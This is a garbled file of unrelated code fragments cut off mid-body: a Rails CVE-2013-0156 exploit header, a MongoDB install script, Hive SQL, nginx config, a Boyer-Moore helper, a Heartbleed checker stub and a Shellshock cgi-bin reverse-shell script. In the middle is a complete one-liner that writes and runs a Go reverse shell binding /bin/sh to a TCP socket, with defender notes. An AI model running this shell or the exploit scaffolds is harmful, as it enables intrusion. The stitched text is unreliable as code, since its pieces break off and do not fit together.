
#!/usr/bin/env ruby
#
# Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0156)
#
# ## Advisory
#
# https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion
#
# ## Caveats
#
#!/bin/bash
# Adds the 10gen MongoDB apt repository and installs the mongodb-10gen package.
# WARNING: Don't use this in production since all passwords are kept at their default.
# NOTE(review): nothing in the lines shown stops the script when a command fails
# (no `set -e` or exit-status checks), so a failed key import does not prevent
# the later install attempt.
# mongodb
# NOTE(review): 7F0CEB10 is a short (32-bit) key ID. Short IDs can collide with
# other keys on a keyserver, so import by the vendor's full fingerprint
# (<FULL_FINGERPRINT_FROM_VENDOR>, placeholder) and verify it after import.
# apt-key adds the key to the system-wide trusted keyring, not just for this repository.
apt-key adv --keyserver keyserver.ubuntu.com --recv 7F0CEB10
# The repository URL is plain http, so package integrity depends entirely on
# apt's signature check against the key imported above.
# `echo -e` turns the trailing \n into a second newline; `>` overwrites any existing list file.
echo -e "deb http://downloads-distro.mongodb.org/repo/ubuntu-upstart dist 10gen\n" > /etc/apt/sources.list.d/mongodb-10gen.list
apt-get update
# -y answers the install prompts automatically.
apt-get install -y mongodb-10gen
-- Period dimension table: one row per rollup period, kept as plain text files.
CREATE TABLE dimension_rollup_periods (
  period_id  STRING,
  time_id    STRING,
  begin_time TIMESTAMP,
  end_time   TIMESTAMP
)
STORED AS TEXTFILE;

/* Run the make_periods.sh script at this point (the script is not shown here). */

-- Read the table's files as comma-separated fields.
ALTER TABLE dimension_rollup_periods SET SERDEPROPERTIES ('field.delim'=',');

-- OVERWRITE replaces whatever the table already holds with the local files under periods/2012.
LOAD DATA LOCAL INPATH 'periods/2012' OVERWRITE INTO TABLE dimension_rollup_periods;
-- This is a Hive program. Hive is an SQL-like language that compiles
-- into Hadoop Map/Reduce jobs. It's very popular among analysts at
-- Facebook, because it allows them to query enormous Hadoop data
-- stores using a language much like SQL.
-- Our logs are stored on the Hadoop Distributed File System, in the
-- directory /logs/randomhacks.net/access. They're ordinary Apache
-- logs in *.gz format.
--
-- We want to pretend that these gzipped log files are a database table,
// Module handles for what looks like a PhantomJS script: a page object created
// from the 'webpage' module, and the 'system' module.
// `var` is kept from the original so hoisting and scope stay exactly the same.
var page = require('webpage').create();
var system = require('system');
// Declared without a value; nothing in the lines shown assigns it.
var address;
page.onInitialized = function () {
page.evaluate(function () {
// additional detection code here perhaps
// f.e. detecting STORED/DOM XSS
});
server {
listen 80;
root /root/to/your/docroot;
proxy_redirect off;
proxy_intercept_errors on;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
# Writes a one-file Go program to /tmp/sh.go and runs it with `go run`. The program
# dials TCP 127.0.0.1:1337 (the net.Dial error is discarded) and starts /bin/sh with
# stdin, stdout and stderr all bound to that connection, i.e. a reverse shell.
# Defender notes: this shows up as a Go toolchain build launched from a file in /tmp
# and a /bin/sh child whose standard streams are a socket; process-lineage rules and
# egress filtering on unexpected outbound connections are the relevant controls.
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go
#!/usr/bin/python3
# openssl-heartbleed-server.py
# Check TLS clients for OpenSSL Heartbleed vulnerability.
import socketserver
import struct
import random
class HeartbleedServer(socketserver.BaseRequestHandler):
# Boyer Moore String Search implementation in Python
# Ameer Ayoub <ameer.ayoub@gmail.com>
# Generate the Bad Character Skip List
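def generateBadCharShift(term):
    """Build the bad-character shift table for a search term.

    Every character of ``term`` except the last is mapped to its distance
    from the end of the term. When a character repeats, the right-most
    occurrence (the smallest distance) wins. The final character is not
    entered into the table, so an empty or one-character term yields an
    empty table.

    Args:
        term: the pattern to search for (any indexable sequence).

    Returns:
        dict mapping each character to its shift distance.
    """
    skipList = {}
    lastIndex = len(term) - 1
    for i in range(lastIndex):
        # Later occurrences overwrite earlier ones, so the stored shift is
        # measured from the right-most occurrence before the last position.
        skipList[term[i]] = lastIndex - i
    return skipList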
# CVE-2014-6271 cgi-bin reverse shell
# Original: http://pastebin.com/raw.php?i=166f8Rjx
import httplib,urllib,sys
if (len(sys.argv)<3):
print "Usage: %s <host> <vulnerable CGI>" % sys.argv[0]
print "Example: %s localhost /cgi-bin/test.cgi" % sys.argv[0]
exit(0)
conn = httplib.HTTPConnection(sys.argv[1])